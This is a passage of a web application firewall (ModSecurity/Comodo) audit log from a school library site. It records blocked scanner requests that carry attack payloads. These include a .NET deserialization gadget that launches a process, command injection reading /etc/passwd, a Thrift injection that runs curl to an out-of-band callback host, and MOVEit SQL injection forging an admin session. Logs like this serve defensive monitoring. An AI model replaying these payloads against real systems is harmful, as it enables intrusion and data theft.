XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --c075c15f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c075c15f-E-- --c075c15f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110468424 13673 (- - -) Stopwatch2: 1748300110468424 13673; combined=12475, p1=417, p2=12029, p3=0, p4=0, p5=28, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c075c15f-Z-- --811fa764-A-- [27/May/2025:05:55:11 +0700] aDTxT2TuEZUBy5rh0sZ7ngAAAAo 103.236.140.4 48756 103.236.140.4 8181 --811fa764-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168708070 --811fa764-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --811fa764-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300111418408 2572 (- - -) Stopwatch2: 1748300111418408 2572; combined=1397, p1=352, p2=1017, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --811fa764-Z-- --061a8a1b-A-- [27/May/2025:05:55:33 +0700] aDTxZd6cNBpj1JOkpQlLDQAAAEM 103.236.140.4 48782 103.236.140.4 8181 --061a8a1b-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 168708082 --061a8a1b-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --061a8a1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --061a8a1b-E-- --061a8a1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300133423925 1670 (- - -) Stopwatch2: 1748300133423925 1670; combined=489, p1=334, p2=133, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --061a8a1b-Z-- --6b80111b-A-- [27/May/2025:06:03:19 +0700] aDTzN96cNBpj1JOkpQlLJwAAAFM 103.236.140.4 48884 103.236.140.4 8181 --6b80111b-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 163090670 --6b80111b-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0q9cd1gpeook7mlf7sgwu45rher4dtbx.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --6b80111b-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b80111b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300599099931 4031 (- - -) Stopwatch2: 1748300599099931 4031; combined=2689, p1=613, p2=1964, p3=31, p4=36, p5=44, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b80111b-Z-- --f937bc17-A-- [27/May/2025:06:24:57 +0700] aDT4SWTuEZUBy5rh0sZ7rAAAAAs 103.236.140.4 49172 103.236.140.4 8181 --f937bc17-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=hngvr2rk3usmbrdi4bvif2c631 X-Varnish: 168969526 --f937bc17-C-- --f937bc17-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f937bc17-E-- --f937bc17-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748301897101301 3908 (- - -) Stopwatch2: 1748301897101301 3908; combined=1882, p1=592, p2=1258, p3=0, p4=0, p5=32, sr=161, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f937bc17-Z-- --3308346a-A-- [27/May/2025:06:25:16 +0700] aDT4XGTuEZUBy5rh0sZ7rgAAAAo 103.236.140.4 49184 103.236.140.4 8181 --3308346a-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xdkfntaUQuE0gGpiDiWzgksxqs');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xdkfntaUQuE0gGpiDiWzgksxqs'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hngvr2rk3usmbrdi4bvif2c631 X-Varnish: 168969529 --3308346a-C-- --3308346a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3308346a-E-- --3308346a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748301916099171 3356 (- - -) Stopwatch2: 1748301916099171 3356; combined=1587, p1=453, p2=1103, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3308346a-Z-- --66888538-A-- [27/May/2025:06:39:35 +0700] aDT7t1uSH_Spa4YU2ZmqcwAAAMg 103.236.140.4 50116 103.236.140.4 8181 --66888538-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792000 --66888538-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0q9cd1gpeook7mlf7sghi1k7cf9ygnu1.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --66888538-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --66888538-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748302775119762 3453 (- - -) Stopwatch2: 1748302775119762 3453; combined=2360, p1=459, p2=1813, p3=29, p4=31, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66888538-Z-- --f6036336-A-- [27/May/2025:07:17:42 +0700] aDUEpt6cNBpj1JOkpQlMFQAAAE8 103.236.140.4 50700 103.236.140.4 8181 --f6036336-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=08jc3ctr85pnsme4iem1s9u2bk X-Varnish: 166620366 --f6036336-C-- --f6036336-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6036336-E-- --f6036336-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748305062098083 3344 (- - -) Stopwatch2: 1748305062098083 3344; combined=1696, p1=483, p2=1185, p3=0, p4=0, p5=28, sr=99, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6036336-Z-- --9cacdd44-A-- [27/May/2025:07:17:48 +0700] aDUErN6cNBpj1JOkpQlMFwAAAFQ 